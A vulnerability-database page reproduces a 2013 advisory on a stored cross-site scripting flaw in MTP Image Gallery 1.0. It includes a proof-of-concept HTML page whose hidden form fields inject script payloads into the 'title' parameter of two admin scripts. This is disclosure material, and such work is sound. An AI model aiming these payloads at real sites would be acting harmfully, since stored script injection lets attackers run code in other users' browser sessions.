MTP Image Gallery 1.0 Cross Site Scripting

2013.02.26
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

?<!-- MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability Vendor: MTP Scripts Product web page: http://www.morephp.net Affected version: 1.0 Summary: MTP Image Gallery offers more control, better uploading and enhanced performance. With MTP Image Gallery you can easily create and maintain albums of photos via an intuitive, web interface. Desc: MTP Image Gallery suffers from a stored XSS vulnerability when parsing user input to the 'title' parameter via POST method thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Linux, Apache2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5130 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php 17.02.2013 --> <html> <head> <title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title> </head> <body><center> <form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit"> <input type="hidden" name="title" value='"><script>alert(1);</script>' /> <input type="hidden" name="Filedata" value="" /> <input type="hidden" name="cats" value="12" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="full" value="1" /> <input type="hidden" name="views" value="1" /> <input type="hidden" name="rating" value="1" /> <input type="hidden" name="author" value="lqwrm" /> <input type="hidden" name="action" value="add" /> <input type="submit" value="XSS #1" /> </form> <br /><br /> <form method="POST" action="http://localhost/gallery/admin/add_cat.php"> <input type="hidden" name="action" value="add" /> <input type="hidden" name="cats" value="1" /> <input type="hidden" name="full" value="1" /> <input type="hidden" name="title" value='"><script>alert(2);</script>' /> <input type="submit" value="XSS #2" /> </form> </center></body> </html>

References:

http://www.morephp.net


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top